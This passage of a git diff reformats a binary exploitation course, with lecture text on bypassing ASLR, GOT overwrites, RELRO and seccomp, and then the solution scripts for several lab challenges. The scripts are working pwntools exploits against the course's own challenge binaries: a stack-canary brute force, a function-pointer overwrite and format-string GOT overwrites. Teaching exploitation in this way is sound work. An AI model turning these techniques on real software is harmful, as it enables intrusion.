eventually reaching the exploit code even if the stack address is randomized. This is not very useful when we are interested in jumping to libc or other functions, which is usually the case if the executable space protection is also active. -* **jmp esp**. This will basically jump into the stack, no matter where it is mapped. It's actually a very rudimentary form of Return Oriented Programming which was discussed in the previous session. -* **Restrict entropy**. There are various ways of reducing the entropy of the randomized address. For example, you can decrease the initial stack size by setting a huge amount of dummy environment variables. -* **Partial overwrite**. This technique is useful when we are able to overwrite only the least significant byte(s) of an address (e.g. a GOT entry). We must take into account the offsets of the original and final addresses from the beginning of the mapping. If these offsets only differ in the last 8 bits, the exploit is deterministic, as the base of the mapping is aligned to 0x1000. The offsets of `read` and `write` in `libc6_2.27-3ubuntu1.2_i386` are suitable for a partial overwrite: - -``` -pwndbg> p read -$1 = {} 0xe6dd0 <__GI___libc_read> -pwndbg> p write -$2 = {} 0xe6ea0 <__GI___libc_write> -``` - -However, since bits 12-16 of the offsets differ, the corresponding bits in the full addresses would have to be bruteforced (probability 1/4). - -* **Information leak**. The most effective way of bypassing ASLR is by using an information leak vulnerability that exposes randomized address, or at least parts of them. You can also dump parts of libraries (e.g. `libc`) if you are able to create an exploit that reads them. This is useful in remote attacks to infer the version of the library, downloading it from the web, and thus knowing the right offsets for other functions (not originally linked with the binary). +- **Bruteforce**: + If you are able to inject payloads multiple times without crashing the application, you can bruteforce the address you are interested in (e.g., a target in libc). + Otherwise, you can just run the exploit multiple times. + Another thing to keep in mind is that, as addresses are randomized at load-time, child processes spawned with fork inherit the memory layout of the parent. + Take the following scenario: we interact with a vulnerable sever that handles connections by forking to another process. + We manage to obtain a leak from a child process but we are not able to create an exploit chain that leads to arbitrary code execution. + However, we may still be able to use this leak in another connection, since the new process will have the same address space as the previous. + +- **NOP sled**: + In the case of shellcodes, a longer NOP sled will maximize the chances of jumping inside it and eventually reaching the exploit code even if the stack address is randomized. + This is not very useful when we are interested in jumping to libc or other functions, which is usually the case if the executable space protection is also active. + +- **jmp esp**: + This will basically jump into the stack, no matter where it is mapped. + It's actually a very rudimentary form of Return Oriented Programming which was discussed in the previous session. + +- **Restrict entropy**: + There are various ways of reducing the entropy of the randomized address. + For example, you can decrease the initial stack size by setting a huge amount of dummy environment variables. + +- **Partial overwrite**: + This technique is useful when we are able to overwrite only the least significant byte(s) of an address (e.g. a GOT entry). + We must take into account the offsets of the original and final addresses from the beginning of the mapping. + If these offsets only differ in the last 8 bits, the exploit is deterministic, as the base of the mapping is aligned to 0x1000. + The offsets of `read` and `write` in `libc6_2.27-3ubuntu1.2_i386` are suitable for a partial overwrite: + + ```console + pwndbg> p read + $1 = {} 0xe6dd0 <__GI___libc_read> + pwndbg> p write + $2 = {} 0xe6ea0 <__GI___libc_write> + ``` + + However, since bits 12-16 of the offsets differ, the corresponding bits in the full addresses would have to be bruteforced (probability 1/4). + +- **Information leak**: + The most effective way of bypassing ASLR is by using an information leak vulnerability that exposes randomized address, or at least parts of them. + You can also dump parts of libraries (e.g. `libc`) if you are able to create an exploit that reads them. + This is useful in remote attacks to infer the version of the library, downloading it from the web, and thus knowing the right offsets for other functions (not originally linked with the binary). ### Chaining Information Leaks with GOT Overwrite In this tutorial we will exploit a program that is similar to the `no-ret-control` challenge from a previous session: -``` +```c #include #include - + int main() { int *addr; - + printf("Here's a libc address: 0x%08x\n", printf); - + printf("Give me and address to modify!\n"); scanf("%p", &addr); - + printf("Give me a value!\n"); scanf("%u", addr); - + sleep(10); - + printf("Abandon all hope ye who reach this...\n"); } ``` -The goal is to alter the execution flow and avoid reaching the final `printf`. To this end, we will overwrite the `sleep` entry in GOT and redirect it to `exit`. However, due to ASLR, the value can not be hardcoded and must be computed at runtime. +The goal is to alter the execution flow and avoid reaching the final `printf`. +To this end, we will overwrite the `sleep` entry in GOT and redirect it to `exit`. +However, due to ASLR, the value can not be hardcoded and must be computed at runtime. -Whenever we operate with addresses belonging to shared libraries, we must be aware that the offsets are highly dependent on the particular build of the library. We can identify this build either by its BuildID (retrieved with the file command), or by its version string: +Whenever we operate with addresses belonging to shared libraries, we must be aware that the offsets are highly dependent on the particular build of the library. +We can identify this build either by its BuildID (retrieved with the file command), or by its version string: -``` +```console silvia@imladris:/sss/demo$ ldd ./got_overwrite linux-gate.so.1 (0xf7ee8000) libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7ccc000) @@ -278,18 +365,18 @@ GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.2) stable release version 2.27. Alternatively, if we don't have prior knowledge of the remote system where the binary runs, but obtain via an information leak some addresses, we may be able to identify the libc based on the last 3 nibbles (a nibble is a group of 4 bits) of these addresses: -``` +```text 0xf7df6250 <__libc_system> 0xf7e780e0 <__sleep> ``` The least significant 3 nibbles of the above addresses are `250` and `0e0`, respectively. -We enter them in the [libc database](https://libc.blukat.me/) and get a match for the same `libc` build we determined earlier. +We enter them in the [libc database](https://libc.blukat.me/) and get a match for the same `libc` build we determined earlier. For this `libc`, we obtain the offsets of the functions we are interested in using GDB: -``` +```console silvia@imladris:/sss/demo$ gdb -q -n /lib/i386-linux-gnu/libc.so.6 (gdb) p printf $1 = {} 0x513a0 <__printf> @@ -299,7 +386,7 @@ $2 = {} 0x30420 <__GI_exit> We will also need the address of `sleep@got` (which is static because the binary is not position independent): -``` +```console silvia@imladris:/sss/demo$ objdump -d -M intel -j .plt ./got_overwrite | grep "sleep@plt" -A1 080483b0 : 80483b0: ff 25 0c a0 04 08 jmp DWORD PTR ds:0x804a00c @@ -307,14 +394,14 @@ silvia@imladris:/sss/demo$ objdump -d -M intel -j .plt ./got_overwrite | grep "s We start the program and compute the address of exit based on the leak of printf (in another terminal): -``` +```text >>> printf_offset = 0x513a0 >>> exit_offset = 0x30420 >>> 0xf7dfb3a0 - printf_offset + exit_offset 4158497824 ``` -``` +```console silvia@imladris:/sss/demo$ ./got_overwrite Here's a libc address: 0xf7dfb3a0 Give me and address to modify! @@ -326,30 +413,29 @@ silvia@imladris:/sss/demo$ echo $? ``` As we intended, the `GOT` entry corresponding to `sleep` was overwritten by exit and the program exited with code 10 without printing the final message. - The following pwntools script automates this interaction: -``` +```python from pwn import * - + p = process('./got_overwrite') libc = ELF('/lib/i386-linux-gnu/libc.so.6') - + sleep_got = p.elf.got['sleep'] - + p.recvuntil('libc address:') libc_leak = int(p.recvuntil('\n')[:-1], 16) libc_base = libc_leak - libc.symbols['printf'] - + print("Libc base is at: 0x%x" % libc_base) - + exit = libc_base + libc.symbols['exit'] - + p.sendline(hex(sleep_got)) - + p.recvuntil('value!') p.sendline(str(exit)) - + p.interactive() ``` @@ -359,25 +445,36 @@ p.interactive() It comes in two flavors: -* **Partial**. Protects the `.init_array`, `.fini_array`, `.dynamic` and `.got` sections (but NOT `.got.plt`); -* **Full**. Additionally protects `.got.plt`, rendering the **GOT overwrite** attack infeasible. +- **Partial**: + Protects the `.init_array`, `.fini_array`, `.dynamic` and `.got` sections (but NOT `.got.plt`). +- **Full**: + Additionally protects `.got.plt`, rendering the **GOT overwrite** attack infeasible. -In a previous session we explained how the addresses of dynamically linked functions are resolved using lazy binding. When Full RELRO is in effect, the addresses are resolved at load-time and then marked as read-only. Due to the way address space protection works, this means that the `.got` resides in the read-only mapping, instead of the read-write mapping that contains the `.bss`. +In a previous session we explained how the addresses of dynamically linked functions are resolved using lazy binding. +When Full RELRO is in effect, the addresses are resolved at load-time and then marked as read-only. +Due to the way address space protection works, this means that the `.got` resides in the read-only mapping, instead of the read-write mapping that contains the `.bss`. -This is not a game-over in terms of exploitation, as other overwriteable code pointers often exist. These can be specific to the application we want to exploit or reside in shared libraries (for example: the GOT of shared libraries that are not compiled with RELRO). The return addresses on the stack are still viable targets. +This is not a game-over in terms of exploitation, as other overwriteable code pointers often exist. +These can be specific to the application we want to exploit or reside in shared libraries (for example: the GOT of shared libraries that are not compiled with RELRO). +The return addresses on the stack are still viable targets. ### seccomp -**Seccomp** is a mechanism though which an application may transition into a state where the system calls it performs are restricted. The policy, which may act on a whitelist or blacklist model, is described using [eBPF](https://lwn.net/Articles/593476/). +**Seccomp** is a mechanism though which an application may transition into a state where the system calls it performs are restricted. +The policy, which may act on a whitelist or blacklist model, is described using [eBPF](https://lwn.net/Articles/593476/). -**Seccomp** filters are instated using the `prctl` syscall (`PR_SET_SECCOMP`). Once it is in effect, the application will be effectively sandboxed and the restrictions will be inherited by child processes. +**Seccomp** filters are instated using the `prctl` syscall (`PR_SET_SECCOMP`). +Once it is in effect, the application will be effectively sandboxed and the restrictions will be inherited by child processes. -This may severely limit our exploitation prospects in some cases. In the challenges that we have solved during these sessions, a common goal was spawning a shell and retrieving a certain file (the flag). If the exploited binary used a seccomp filter that disallowed the `execve` syscall (used by the `system` library function), this would have thwarted our exploit. +This may severely limit our exploitation prospects in some cases. +In the challenges that we have solved during these sessions, a common goal was spawning a shell and retrieving a certain file (the flag). +If the exploited binary used a seccomp filter that disallowed the `execve` syscall (used by the `system` library function), this would have thwarted our exploit. -The [seccomp-tools](https://github.com/david942j/seccomp-tools) suite provides tools for analyzing seccomp filters. The `dump` subcommand may be used to extract the filter from a binary at runtime and display it in a pseudocode format: +The [seccomp-tools](https://github.com/david942j/seccomp-tools) suite provides tools for analyzing seccomp filters. +The `dump` subcommand may be used to extract the filter from a binary at runtime and display it in a pseudocode format: -``` -silvia@imladris:/sss/demo$ seccomp-tools dump ./seccomp_example +```console +$ seccomp-tools dump ./seccomp_example line CODE JT JF K ================================= 0000: 0x20 0x00 0x00 0x00000004 A = arch @@ -398,39 +495,45 @@ In the example above we see a filter operating on the whitelist model: it specif To install `seccomp-tools` on the Kali VM, use the the `gem` package manager: -``` -$ gem install seccomp-tools +```console +gem install seccomp-tools ``` ## Challenges -Challenges can be found in the `activities/` directory. +Challenges can be found in the `drills/` directory. ### 01-04. Challenges - rwslotmachine[1-4] -All of the challenges in this section are intended to be solved with **ASLR enabled**. However, you are free to disable it while developing your exploit for debugging purposes. You are provided with the needed shared libraries from the remote system. +All of the challenges in this section are intended to be solved with **ASLR enabled**. +However, you are free to disable it while developing your exploit for debugging purposes. +You are provided with the needed shared libraries from the remote system. -The challenges are based on the same "application": the binaries expose very similar functionality with minimal implementation differences. Your job is to identify the defense mechanisms in use for each of them and bypass them in order to read a flag from the remote system. +The challenges are based on the same "application": the binaries expose very similar functionality with minimal implementation differences. +Your job is to identify the defense mechanisms in use for each of them and bypass them in order to read a flag from the remote system. They are numbered in the suggested solving order. **Tips**: -* Do not waste time on reverse engineering `rwslotmachine3`! It is very similar to `rwslotmachine2`, but operates on the client/server model. -* To set `LD_LIBRARY_PATH` from within a pwntools script, use `p = process('./rwslotmachineX', env={'LD_LIBRARY_PATH' : '.'})`. -* In the case of `rwslotmachine4`, you will need the shared library `libint.so` (found inside of the github repo). +- Do not waste time on reverse engineering `rwslotmachine3`! + It is very similar to `rwslotmachine2`, but operates on the client/server model. +- To set `LD_LIBRARY_PATH` from within a pwntools script, use `p = process('./rwslotmachineX', env={'LD_LIBRARY_PATH' : '.'})`. +- In the case of `rwslotmachine4`, you will need the shared library `libint.so` (found inside of the github repo). ### 05. Bonus - rwslotmachine5 -This challenge is similar to `rwslotmachine1`. However, your exploit for the first challenge will (most likely) not work. Investigate why and develop a bypass. +This challenge is similar to `rwslotmachine1`. +However, your exploit for the first challenge will (most likely) not work. +Investigate why and develop a bypass. -**Hint**: You can find a table describing x86 syscalls [here](https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86-32_bit). +**Hint**: You can find a table describing x86 syscalls [here](https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86-32_bit). ## Further Reading -* [PaX PAGEEXEC](https://en.wikipedia.org/wiki/PaX#PAGEEXEC) -* [PaX SEGMEXEC](https://en.wikipedia.org/wiki/PaX#SEGMEXEC) -* [Black Hat & DEF CON 2010, JIT spraying slides](http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Slides-v2.pdf); -* [Interpreter Exploitation. Pointer Inference and JIT Spraying](http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf). -* [DEP](https://docs.microsoft.com/en-us/windows/win32/memory/data-execution-prevention) -* [eBPF](https://lwn.net/Articles/593476/) +- [PaX PAGEEXEC](https://en.wikipedia.org/wiki/PaX#PAGEEXEC) +- [PaX SEGMEXEC](https://en.wikipedia.org/wiki/PaX#SEGMEXEC) +- [Black Hat & DEF CON 2010, JIT spraying slides](http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Slides-v2.pdf); +- [Interpreter Exploitation. Pointer Inference and JIT Spraying](http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf). +- [DEP](https://docs.microsoft.com/en-us/windows/win32/memory/data-execution-prevention) +- [eBPF](https://lwn.net/Articles/593476/) diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/01-challenge-mycanary/sol/exploit.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/01-challenge-mycanary/sol/exploit.py index f124da0..6aaf8fc 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/01-challenge-mycanary/sol/exploit.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/01-challenge-mycanary/sol/exploit.py @@ -2,30 +2,36 @@ from pwn import * e = ELF("../src/mycanary", checksec=False) -bad_func = e.symbols['bad_func'] +bad_func = e.symbols["bad_func"] - -payload = b"A" * 100 + b"\xef\xbe\x01\xde" + p32(bad_func) + p32(bad_func) + p32(bad_func) + p32(bad_func) +payload = ( + b"A" * 100 + + b"\xef\xbe\x01\xde" + + p32(bad_func) + + p32(bad_func) + + p32(bad_func) + + p32(bad_func) +) c = 0 # brute force loop while True: - print(p32(bad_func)) - # open program - p = remote("127.0.0.1",4545) - #print(p.recvline()) - p.sendline(payload) - # recieve trash text and discard - line = p.recv() - - print(line) - p.close() + print(p32(bad_func)) + # open program + p = remote("127.0.0.1", 4545) + # print(p.recvline()) + p.sendline(payload) + # receive trash text and discard + line = p.recv() + + print(line) + p.close() - if b"Missile launched!" in line: - # SUCCESS!!$$$ - print(line) - print("Success after %d attempts" % c) - break - else: - c += 1 + if b"Missile launched!" in line: + # SUCCESS!!$$$ + print(line) + print("Success after %d attempts" % c) + break + else: + c += 1 diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/01-challenge-mycanary/sol/exploit_local.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/01-challenge-mycanary/sol/exploit_local.py index 88a0737..0abb033 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/01-challenge-mycanary/sol/exploit_local.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/01-challenge-mycanary/sol/exploit_local.py @@ -2,35 +2,43 @@ from pwn import * e = ELF("../src/mycanary", checksec=False) -bad_func = e.symbols['bad_func'] +bad_func = e.symbols["bad_func"] -payload = b"A" * 100 + b"\xef\xbe\x01\xde" + p32(bad_func) + p32(bad_func)+ p32(bad_func)+ p32(bad_func)+ p32(bad_func) +payload = ( + b"A" * 100 + + b"\xef\xbe\x01\xde" + + p32(bad_func) + + p32(bad_func) + + p32(bad_func) + + p32(bad_func) + + p32(bad_func) +) c = 0 # brute force loop while True: - # open program - p = process('../src/mycanary') - #p=gdb.debug( './mycanary','''set follow-fork-mode child - # break *0x080499b6 - # continue - # ''') - p.sendline(payload) - # recieve trash text and discard - line = p.recvline() - print(line) - if b'Canary' not in line: - p.kill() - - else: - line = p.recv() - print(line) - break - if "Missile launched!" in line.decode(): - # SUCCESS!!$$$ - print(line) - print("Success after %d attempts" % c) - break - else: - c += 1 + # open program + p = process("../src/mycanary") + # p=gdb.debug( './mycanary','''set follow-fork-mode child + # break *0x080499b6 + # continue + # ''') + p.sendline(payload) + # receive trash text and discard + line = p.recvline() + print(line) + if b"Canary" not in line: + p.kill() + + else: + line = p.recv() + print(line) + break + if "Missile launched!" in line.decode(): + # SUCCESS!!$$$ + print(line) + print("Success after %d attempts" % c) + break + else: + c += 1 diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/02-challenge-bulletproof/sol/exploit.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/02-challenge-bulletproof/sol/exploit.py index 1d3e8d2..4c96135 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/02-challenge-bulletproof/sol/exploit.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/02-challenge-bulletproof/sol/exploit.py @@ -1,26 +1,28 @@ #!/usr/bin/python from pwn import * + # Helper function to extract one byte from an integer # ex. extract_byte(0xaabbccdd, 0) => 0xdd # ex. extract_byte(0xaabbccdd, 2) => 0xbb def extract_byte(value, pos): - return (value >> (pos * 8)) % 256 + return (value >> (pos * 8)) % 256 + e = ELF("./bulletproof", checksec=False) -bad_func = e.symbols['bad_func'] -exit_handler = e.symbols['exit_handler'] -admin_name = e.symbols['admin'] + 4 +bad_func = e.symbols["bad_func"] +exit_handler = e.symbols["exit_handler"] +admin_name = e.symbols["admin"] + 4 p = process("./bulletproof") # Overwrite function pointer -p.send('2') +p.send("2") p.sendline("%d %s" % (exit_handler - admin_name, chr(extract_byte(bad_func, 0)))) p.sendline("%d %s" % (exit_handler - admin_name + 1, chr(extract_byte(bad_func, 1)))) p.sendline("%d %s" % (exit_handler - admin_name + 2, chr(extract_byte(bad_func, 2)))) p.sendline("%d %s" % (exit_handler - admin_name + 3, chr(extract_byte(bad_func, 3)))) -p.send('3') +p.send("3") print(p.recv()) p.close() diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format1.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format1.py index c0b16cc..2c6cdd2 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format1.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format1.py @@ -7,23 +7,30 @@ # the stack head varies between runs. We use helper_format1.py # to determine where it might reside -e = ELF('./format1', checksec=False) - -target_offset = e.symbols['target'] +e = ELF("./format1", checksec=False) + +target_offset = e.symbols["target"] # This number is found using helper_format1.py position = 256 for i in range(1000): - payload = "AAAABBBB" + p32(target_offset) + "DDDD %" + str(position) + "$n%" + str(position+1) + "$x" + payload = ( + "AAAABBBB" + + p32(target_offset) + + "DDDD %" + + str(position) + + "$n%" + + str(position + 1) + + "$x" + ) - p = process(["./format1", payload]) + p = process(["./format1", payload]) - try: - print("%s"% (p.read())) - break - except EOFError: - pass - + try: + print("%s" % (p.read())) + break + except EOFError: + pass - p.close() + p.close() diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format3.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format3.py index 37682da..99e3391 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format3.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format3.py @@ -2,11 +2,16 @@ from pwn import * import sys -e = ELF('./format3', checksec=False) - -target_addr = int(e.symbols['target']) +e = ELF("./format3", checksec=False) -payload = p32(target_addr) + p32(target_addr + 1) + p32(target_addr + 2) + p32(target_addr + 3) +target_addr = int(e.symbols["target"]) + +payload = ( + p32(target_addr) + + p32(target_addr + 1) + + p32(target_addr + 2) + + p32(target_addr + 3) +) payload += "%52x" + "%12$n" + "%17x" + "%13$n" + "%173x" + "%14$n" print(payload) diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format4.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format4.py index 0e12a4d..757cf87 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format4.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format4.py @@ -6,50 +6,58 @@ # could be shorter. The reason it is so long is because it takes into # account the fact that the address for the 'hello' function could change + # Helper function to extract one byte from an integer # ex. extract_byte(0xaabbccdd, 0) => 0xdd # ex. extract_byte(0xaabbccdd, 2) => 0xbb def extract_byte(value, pos): - return (value >> (pos * 8)) % 256 + return (value >> (pos * 8)) % 256 + def get_byte_padding(current, wanted): - # Fuction is supposed to only give paddings for one byte - wanted %= 256 - current %= 256 - - # Printing a hex value with less than 8 padding can - # print variable number of digits. We need to be sure - # how many digits we print - if wanted - 8 >= current: - return wanted - current - else: - return wanted + 256 - current - -e = ELF('./format4', checksec=False) - -target_addr = int(e.symbols['got.exit']) -hello_addr = int(e.symbols['hello']) + # Fuction is supposed to only give paddings for one byte + wanted %= 256 + current %= 256 + + # Printing a hex value with less than 8 padding can + # print variable number of digits. We need to be sure + # how many digits we print + if wanted - 8 >= current: + return wanted - current + else: + return wanted + 256 - current + + +e = ELF("./format4", checksec=False) + +target_addr = int(e.symbols["got.exit"]) +hello_addr = int(e.symbols["hello"]) # Position on the stack where the arguments will be pos = 4 -payload = p32(target_addr) + p32(target_addr + 1) + p32(target_addr + 2) + p32(target_addr + 3) +payload = ( + p32(target_addr) + + p32(target_addr + 1) + + p32(target_addr + 2) + + p32(target_addr + 3) +) bytes_printed = len(payload) + 1 next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 0)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 1)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos + 1)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 1) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 2)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos + 2)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 2) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 3)) -payload += "%" + str(next_padding) + "x %" + str(pos + 3)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 3) + "$n" print(payload) @@ -58,4 +66,3 @@ def get_byte_padding(current, wanted): # p.sendline(payload) # print(p.read()) # p.close() - diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/helper_format1.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/helper_format1.py index 5804e05..2191924 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/helper_format1.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/helper_format1.py @@ -4,16 +4,16 @@ # Run with: # python helper_format1.py | grep -va 'rocess' | grep -aP '.*?AAAABBBBCCCCDDDD.*?4[1234]' | grep -aP '4[1234]' -e = ELF('./format1') +e = ELF("./format1") -for i in range(1,1000): - # The spaces are needed in order to properly align the format string - # in 4B blocks - as the arguments for printf are treated as each being - # 4B. If you delete some spaces you will notice that it starts being off - payload = "AAAABBBBCCCCDDDD %" + str(i) + "$x%" + str(i+1) + "$x" +for i in range(1, 1000): + # The spaces are needed in order to properly align the format string + # in 4B blocks - as the arguments for printf are treated as each being + # 4B. If you delete some spaces you will notice that it starts being off + payload = "AAAABBBBCCCCDDDD %" + str(i) + "$x%" + str(i + 1) + "$x" - p = process(["./format1", payload]) + p = process(["./format1", payload]) - print("%d %s"% (i, p.read())) + print("%d %s" % (i, p.read())) - p.close() + p.close() diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format1.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format1.py index c0b16cc..2c6cdd2 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format1.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format1.py @@ -7,23 +7,30 @@ # the stack head varies between runs. We use helper_format1.py # to determine where it might reside -e = ELF('./format1', checksec=False) - -target_offset = e.symbols['target'] +e = ELF("./format1", checksec=False) + +target_offset = e.symbols["target"] # This number is found using helper_format1.py position = 256 for i in range(1000): - payload = "AAAABBBB" + p32(target_offset) + "DDDD %" + str(position) + "$n%" + str(position+1) + "$x" + payload = ( + "AAAABBBB" + + p32(target_offset) + + "DDDD %" + + str(position) + + "$n%" + + str(position + 1) + + "$x" + ) - p = process(["./format1", payload]) + p = process(["./format1", payload]) - try: - print("%s"% (p.read())) - break - except EOFError: - pass - + try: + print("%s" % (p.read())) + break + except EOFError: + pass - p.close() + p.close() diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format3.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format3.py index 37682da..99e3391 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format3.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format3.py @@ -2,11 +2,16 @@ from pwn import * import sys -e = ELF('./format3', checksec=False) - -target_addr = int(e.symbols['target']) +e = ELF("./format3", checksec=False) -payload = p32(target_addr) + p32(target_addr + 1) + p32(target_addr + 2) + p32(target_addr + 3) +target_addr = int(e.symbols["target"]) + +payload = ( + p32(target_addr) + + p32(target_addr + 1) + + p32(target_addr + 2) + + p32(target_addr + 3) +) payload += "%52x" + "%12$n" + "%17x" + "%13$n" + "%173x" + "%14$n" print(payload) diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format4.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format4.py index 0e12a4d..757cf87 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format4.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/exploit_format4.py @@ -6,50 +6,58 @@ # could be shorter. The reason it is so long is because it takes into # account the fact that the address for the 'hello' function could change + # Helper function to extract one byte from an integer # ex. extract_byte(0xaabbccdd, 0) => 0xdd # ex. extract_byte(0xaabbccdd, 2) => 0xbb def extract_byte(value, pos): - return (value >> (pos * 8)) % 256 + return (value >> (pos * 8)) % 256 + def get_byte_padding(current, wanted): - # Fuction is supposed to only give paddings for one byte - wanted %= 256 - current %= 256 - - # Printing a hex value with less than 8 padding can - # print variable number of digits. We need to be sure - # how many digits we print - if wanted - 8 >= current: - return wanted - current - else: - return wanted + 256 - current - -e = ELF('./format4', checksec=False) - -target_addr = int(e.symbols['got.exit']) -hello_addr = int(e.symbols['hello']) + # Fuction is supposed to only give paddings for one byte + wanted %= 256 + current %= 256 + + # Printing a hex value with less than 8 padding can + # print variable number of digits. We need to be sure + # how many digits we print + if wanted - 8 >= current: + return wanted - current + else: + return wanted + 256 - current + + +e = ELF("./format4", checksec=False) + +target_addr = int(e.symbols["got.exit"]) +hello_addr = int(e.symbols["hello"]) # Position on the stack where the arguments will be pos = 4 -payload = p32(target_addr) + p32(target_addr + 1) + p32(target_addr + 2) + p32(target_addr + 3) +payload = ( + p32(target_addr) + + p32(target_addr + 1) + + p32(target_addr + 2) + + p32(target_addr + 3) +) bytes_printed = len(payload) + 1 next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 0)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 1)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos + 1)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 1) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 2)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos + 2)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 2) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 3)) -payload += "%" + str(next_padding) + "x %" + str(pos + 3)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 3) + "$n" print(payload) @@ -58,4 +66,3 @@ def get_byte_padding(current, wanted): # p.sendline(payload) # print(p.read()) # p.close() - diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/helper_format1.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/helper_format1.py index 5804e05..2191924 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/helper_format1.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format2/sol/helper_format1.py @@ -4,16 +4,16 @@ # Run with: # python helper_format1.py | grep -va 'rocess' | grep -aP '.*?AAAABBBBCCCCDDDD.*?4[1234]' | grep -aP '4[1234]' -e = ELF('./format1') +e = ELF("./format1") -for i in range(1,1000): - # The spaces are needed in order to properly align the format string - # in 4B blocks - as the arguments for printf are treated as each being - # 4B. If you delete some spaces you will notice that it starts being off - payload = "AAAABBBBCCCCDDDD %" + str(i) + "$x%" + str(i+1) + 